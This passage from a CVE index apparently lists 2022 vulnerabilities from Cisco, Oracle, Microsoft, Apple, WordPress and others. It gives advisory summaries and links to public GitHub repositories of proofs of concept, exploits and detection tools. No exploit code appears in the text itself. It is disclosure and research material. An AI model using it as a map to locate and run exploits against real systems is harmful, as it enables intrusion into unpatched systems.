- [rohan-flutterint/CVE-2022-20699](https://github.com/rohan-flutterint/CVE-2022-20699)

### CVE-2022-20818 (2022-09-30)

Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.

- [mbadanoiu/CVE-2022-20818](https://github.com/mbadanoiu/CVE-2022-20818)

### CVE-2022-20829 (2022-06-24)

A vulnerability in the packaging of Cisco Adaptive Security Device Manager (ASDM) images and the validation of those images by Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker with administrative privileges to upload an ASDM image that contains malicious code to a device that is running Cisco ASA Software. This vulnerability is due to insufficient validation of the authenticity of an ASDM image during its installation on a device that is running Cisco ASA Software. An attacker could exploit this vulnerability by installing a crafted ASDM image on the device that is running Cisco ASA Software and then waiting for a targeted user to access that device using ASDM. A successful exploit could allow the attacker to execute arbitrary code on the machine of the targeted user with the privileges of that user on that machine. Notes: To successfully exploit this vulnerability, the attacker must have administrative privileges on the device that is running Cisco ASA Software. Potential targets are limited to users who manage the same device that is running Cisco ASA Software using ASDM. Cisco has released and will release software updates that address this vulnerability.

- [jbaines-r7/theway](https://github.com/jbaines-r7/theway)

### CVE-2022-20866 (2022-08-10)

A vulnerability in the handling of RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve an RSA private key. This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key. The following conditions may be observed on an affected device: This vulnerability will apply to approximately 5 percent of the RSA keys on a device that is running a vulnerable release of Cisco ASA Software or Cisco FTD Software; not all RSA keys are expected to be affected due to mathematical calculations applied to the RSA key. The RSA key could be valid but have specific characteristics that make it vulnerable to the potential leak of the RSA private key. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. See the Indicators of Compromise section for more information on the detection of this type of RSA key. The RSA key could be malformed and invalid. A malformed RSA key is not functional, and a TLS client connection to a device that is running Cisco ASA Software or Cisco FTD Software that uses the malformed RSA key will result in a TLS signature failure, which means a vulnerable software release created an invalid RSA signature that failed verification. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic.

- [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866)

### CVE-2022-21241 (2022-02-08)

Cross-site scripting vulnerability in CSV+ prior to 0.8.1 allows a remote unauthenticated attacker to inject an arbitrary script or an arbitrary OS command via a specially crafted CSV file that contains an HTML `a` tag.

- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability)

### CVE-2022-21306 (2022-01-19)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306)

### CVE-2022-21340 (2022-01-19)

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

- [Alexandre-Bartel/CVE-2022-21340](https://github.com/Alexandre-Bartel/CVE-2022-21340)

### CVE-2022-21350 (2022-01-19)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L).

- [hktalent/CVE-2022-21350](https://github.com/hktalent/CVE-2022-21350)

### CVE-2022-21371 (2022-01-19)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371)
- [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)
- [Cappricio-Securities/CVE-2022-21371](https://github.com/Cappricio-Securities/CVE-2022-21371)

### CVE-2022-21392 (2022-01-19)

Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Policy Framework). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 8.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).

- [mbadanoiu/CVE-2022-21392](https://github.com/mbadanoiu/CVE-2022-21392)

### CVE-2022-21445 (2022-04-19)

Vulnerability in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks of this vulnerability can result in takeover of Oracle JDeveloper. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [M0chae1/CVE-2022-21445](https://github.com/M0chae1/CVE-2022-21445)
- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic)

### CVE-2022-21449 (2022-04-19)

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

- [jfrog/jfrog-CVE-2022-21449](https://github.com/jfrog/jfrog-CVE-2022-21449)
- [jmiettinen/CVE-2022-21449-vuln-test](https://github.com/jmiettinen/CVE-2022-21449-vuln-test)
- [notkmhn/CVE-2022-21449-TLS-PoC](https://github.com/notkmhn/CVE-2022-21449-TLS-PoC)
- [marschall/psychic-signatures](https://github.com/marschall/psychic-signatures)
- [thack1/CVE-2022-21449](https://github.com/thack1/CVE-2022-21449)
- [Damok82/SignChecker](https://github.com/Damok82/SignChecker)
- [fundaergn/CVE-2022-21449](https://github.com/fundaergn/CVE-2022-21449)
- [Skipper7718/CVE-2022-21449-showcase](https://github.com/Skipper7718/CVE-2022-21449-showcase)
- [davwwwx/CVE-2022-21449](https://github.com/davwwwx/CVE-2022-21449)
- [AlexanderZinoni/CVE-2022-21449](https://github.com/AlexanderZinoni/CVE-2022-21449)
- [HeyMrSalt/AIS3-2024-Project-D5Team](https://github.com/HeyMrSalt/AIS3-2024-Project-D5Team)

### CVE-2022-21500 (2022-05-19)

Vulnerability in Oracle E-Business Suite (component: Manage Proxies). The supported version that is affected is 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered. Oracle E-Business Suite 12.1 is not impacted by this vulnerability. Customers should refer to the Patch Availability Document for details. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500)

### CVE-2022-21587 (2022-10-18)

Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [hieuminhnv/CVE-2022-21587-POC](https://github.com/hieuminhnv/CVE-2022-21587-POC)
- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit)
- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-)

### CVE-2022-21658 (2022-01-20)

Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable to a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability, with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions.

- [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658)

### CVE-2022-21660 (2022-02-09)

Gin-vue-admin is a backstage management system based on vue and gin. In versions prior to 2.4.7 low privilege users are able to modify higher privilege users. Authentication is missing on the `setUserInfo` function. Users are advised to update as soon as possible. There are no known workarounds.

- [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660)
- [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660)

### CVE-2022-21661 (2022-01-06)

WordPress is a free and open-source content management system written in PHP and paired with a MariaDB database. Due to improper sanitization in WP_Query, there can be cases where SQL injection is possible through plugins or themes that use it in a certain way. This has been patched in WordPress version 5.8.3. Older affected versions are also fixed via security releases going back to 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability.

- [TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection](https://github.com/TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection)
- [purple-WL/wordpress-CVE-2022-21661](https://github.com/purple-WL/wordpress-CVE-2022-21661)
- [0x4E0x650x6F/Wordpress-cve-CVE-2022-21661](https://github.com/0x4E0x650x6F/Wordpress-cve-CVE-2022-21661)
- [z92g/CVE-2022-21661](https://github.com/z92g/CVE-2022-21661)
- [guestzz/CVE-2022-21661](https://github.com/guestzz/CVE-2022-21661)
- [safe3s/CVE-2022-21661](https://github.com/safe3s/CVE-2022-21661)
- [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661)
- [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo)
- [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC)
- [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661)
- [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661)

### CVE-2022-21668 (2022-01-10)

pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.

- [sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability](https://github.com/sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability)

### CVE-2022-21724 (2022-02-02)

pgjdbc is the official PostgreSQL JDBC Driver. A security hole was found in the JDBC driver for the PostgreSQL database while doing security research. A system using the pgjdbc library can be attacked when an attacker controls the JDBC URL or properties. pgjdbc instantiates plugin instances based on class names provided via the `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, and `sslpasswordcallback` connection properties. However, the driver did not verify whether the class implements the expected interface before instantiating it. This can lead to code execution via arbitrary loaded classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.

- [ToontjeM/CVE-2022-21724](https://github.com/ToontjeM/CVE-2022-21724)

### CVE-2022-21728 (2022-02-03)

Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of the array), however if the value is too negative then the implementation of `Dim` would access elements before the start of an array. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

- [mwina/CVE-2022-21728-test](https://github.com/mwina/CVE-2022-21728-test)

### CVE-2022-21789 (2022-08-01)

In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06478101; Issue ID: ALPS06478101.

- [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789)

### CVE-2022-21839 (2022-01-11)

Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability

- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-)

### CVE-2022-21877 (2022-01-11)

Storage Spaces Controller Information Disclosure Vulnerability

- [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877)

### CVE-2022-21881 (2022-01-11)

Windows Kernel Elevation of Privilege Vulnerability

- [theabysslabs/CVE-2022-21881](https://github.com/theabysslabs/CVE-2022-21881)

### CVE-2022-21882 (2022-01-11)

Win32k Elevation of Privilege Vulnerability

- [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882)
- [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882)
- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882)
- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc)
- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882)
- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882)

### CVE-2022-21894 (2022-01-11)

Secure Boot Security Feature Bypass Vulnerability

- [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894)
- [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload)
- [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7)
- [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection)
- [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection)
- [nova-master/CVE-2022-21894-Payload-New](https://github.com/nova-master/CVE-2022-21894-Payload-New)

### CVE-2022-21907 (2022-01-11)

HTTP Protocol Stack Remote Code Execution Vulnerability

- [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907)
- [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907)
- [ZZ-SOCMAP/CVE-2022-21907](https://github.com/ZZ-SOCMAP/CVE-2022-21907)
- [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907)
- [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys)
- [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC)
- [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907)
- [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907)
- [iveresk/cve-2022-21907-http.sys](https://github.com/iveresk/cve-2022-21907-http.sys)
- [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907)
- [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907)
- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)
- [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907)
- [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE)
- [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907)
- [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907)

### CVE-2022-21970 (2022-01-11)

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

- [Malwareman007/CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)

### CVE-2022-21971 (2022-02-09)

Windows Runtime Remote Code Execution Vulnerability

- [0vercl0k/CVE-2022-21971](https://github.com/0vercl0k/CVE-2022-21971)
- [tufanturhan/CVE-2022-21971-Windows-Runtime-RCE](https://github.com/tufanturhan/CVE-2022-21971-Windows-Runtime-RCE)
- [Malwareman007/CVE-2022-21971](https://github.com/Malwareman007/CVE-2022-21971)

### CVE-2022-21974 (2022-02-09)

Roaming Security Rights Management Services Remote Code Execution Vulnerability

- [0vercl0k/CVE-2022-21974](https://github.com/0vercl0k/CVE-2022-21974)

### CVE-2022-21984 (2022-02-09)

Windows DNS Server Remote Code Execution Vulnerability

- [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984)

### CVE-2022-21999 (2022-02-09)

Windows Print Spooler Elevation of Privilege Vulnerability

- [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool)

### CVE-2022-22029 (2022-07-12)

Windows Network File System Remote Code Execution Vulnerability

- [mchoudhary15/CVE-2022-22029-NFS-Server-](https://github.com/mchoudhary15/CVE-2022-22029-NFS-Server-)

### CVE-2022-22057 (2022-06-14)

Use after free in graphics fence due to a race condition while closing a fence file descriptor and destroying the graphics timeline simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables.

- [diabl0w/CVE-2022-22057_SM-F926U](https://github.com/diabl0w/CVE-2022-22057_SM-F926U)

### CVE-2022-22063 (2022-12-14)

Memory corruption in Core due to improper configuration in boot remapper.

- [msm8916-mainline/CVE-2022-22063](https://github.com/msm8916-mainline/CVE-2022-22063)

### CVE-2022-22274 (2022-03-25)

A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.

- [4lucardSec/Sonic_CVE-2022-22274_poc](https://github.com/4lucardSec/Sonic_CVE-2022-22274_poc)
- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc)
- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)

### CVE-2022-22296 (2022-01-24)

Sourcecodester Hospital's Patient Records Management System 1.0 is vulnerable to Insecure Permissions via the id parameter in the manage_user endpoint. Simply changing the value causes the data of other users to be displayed.

- [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296)

### CVE-2022-22536 (2022-02-09)

SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.

- [ZZ-SOCMAP/CVE-2022-22536](https://github.com/ZZ-SOCMAP/CVE-2022-22536)
- [tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536](https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536)

### CVE-2022-22555 (2022-07-20)

Dell EMC PowerStore, contains an OS command injection Vulnerability. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.

- [colaoo123/cve-2022-22555](https://github.com/colaoo123/cve-2022-22555)

### CVE-2022-22582 (2023-02-27)

A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files.

- [poizon-box/CVE-2022-22582](https://github.com/poizon-box/CVE-2022-22582)

### CVE-2022-22600 (2022-03-18)

The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences.

- [KlinKlinKlin/MSF-screenrecord-on-MacOS](https://github.com/KlinKlinKlin/MSF-screenrecord-on-MacOS)

### CVE-2022-22620 (2022-03-18)

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

- [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620)
- [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620)
- [bb33bb/dkjiayu.github.io](https://github.com/bb33bb/dkjiayu.github.io)

### CVE-2022-22629 (2022-09-23)

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution.

- [parsdefense/CVE-2022-22629](https://github.com/parsdefense/CVE-2022-22629)

### CVE-2022-22639 (2022-03-18)

A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges.

- [jhftss/CVE-2022-22639](https://github.com/jhftss/CVE-2022-22639)

### CVE-2022-22718 (2022-02-09)

Windows Print Spooler Elevation of Privilege Vulnerability

- [ahmetfurkans/CVE-2022-22718](https://github.com/ahmetfurkans/CVE-2022-22718)

### CVE-2022-22720 (2022-03-14)

Apache HTTP Server 2.4.52 and earlier fails to close the inbound connection when errors are encountered while discarding the request body, exposing the server to HTTP Request Smuggling.

- [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720)

### CVE-2022-22733 (2022-01-20)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has a guest account to perform privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.

- [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733)

### CVE-2022-22814 (2022-03-10)

The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation.

- [DShankle/CVE-2022-22814_PoC](https://github.com/DShankle/CVE-2022-22814_PoC)

### CVE-2022-22818 (2022-02-03)

The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.

- [Prikalel/django-xss-example](https://github.com/Prikalel/django-xss-example)

### CVE-2022-22822 (2022-01-08)

addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.

- [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827)

### CVE-2022-22828 (2022-01-27)

An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string.

- [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828)

### CVE-2022-22845 (2022-01-09)

QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations.

- [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit)

### CVE-2022-22850 (2022-01-26)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Hospital's Patient Records Management System 1.0 via the description parameter in room_types.

- [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850)

### CVE-2022-22851 (2022-01-26)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php.

- [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851)

### CVE-2022-22852 (2022-01-26)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Hospital's Patient Records Management System 1.0 via the description parameter in room_list.

- [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852)

### CVE-2022-22885 (2022-02-16)

Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.

- [miguelc49/CVE-2022-22885-2](https://github.com/miguelc49/CVE-2022-22885-2)
- [miguelc49/CVE-2022-22885-1](https://github.com/miguelc49/CVE-2022-22885-1)

### CVE-2022-22909 (2022-03-02)

HotelDruid v3.0.3 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via an attacker inserting a crafted payload into the name field under the Create New Room module.

- [0z09e/CVE-2022-22909](https://github.com/0z09e/CVE-2022-22909)
- [kaal18/CVE-2022-22909](https://github.com/kaal18/CVE-2022-22909)

### CVE-2022-22916 (2022-02-17)

O2OA v6.4.7 was discovered to contain a remote code execution (RCE) vulnerability via /x_program_center/jaxrs/invoke.

- [0x7eTeam/CVE-2022-22916](https://github.com/0x7eTeam/CVE-2022-22916)

### CVE-2022-22947 (2022-03-03)

In Spring Cloud Gateway versions prior to 3.1.1+ and 3.0.7+, applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.

- [lucksec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947)
- [scopion/cve-2022-22947](https://github.com/scopion/cve-2022-22947)
